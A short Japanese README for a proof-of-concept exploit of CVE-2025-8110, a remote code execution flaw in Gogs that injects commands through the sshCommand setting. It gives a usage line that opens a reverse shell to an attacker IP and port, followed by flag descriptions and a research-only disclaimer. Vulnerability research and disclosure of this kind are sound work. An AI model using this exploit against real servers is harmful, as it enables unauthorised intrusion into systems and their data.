
CVE-2025-8110 PoC
このリポジトリには、Gogs におけるリモートコード実行 (RCE) の脆弱性である CVE-2025-8110 の Proof of Concept (PoC) が含まれています。このエクスプロイトは内部 SSH サーバーの実装を標的としており、攻撃者が sshCommand 設定を介して悪意のあるコマンドを注入できるようにします。
エクスプロイトを実行するには、CVE-2025-8110.py スクリプトをターゲットの Gogs URL とリバースシェル用の待ち受けホスト/ポートとともに使用します。
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: ターゲットの Gogs インスタンスのベース URL (例: http://localhost:3000)。-lh, --host: リバースシェルが接続を戻す IP アドレス。-lp, --port: リバースシェルが接続を戻すポート。-x, --proxy: (任意) デバッグ用に http://localhost:8080 のローカルプロキシを使用します。この Proof of Concept (PoC) は教育および研究目的のみに提供されます。セキュリティ研究者や管理者が CVE-2025-8110 の脆弱性を理解し、緩和することを目的としています。
著者は、このコードの不正使用または悪意のある使用について一切の責任を負いません。このツールは、自分が所有するシステム、または明示的な許可を得てテストするシステムでのみ使用してください。本コードを使用することで、あなたは自身の行動に対する全責任を負うことに同意したものとみなされます。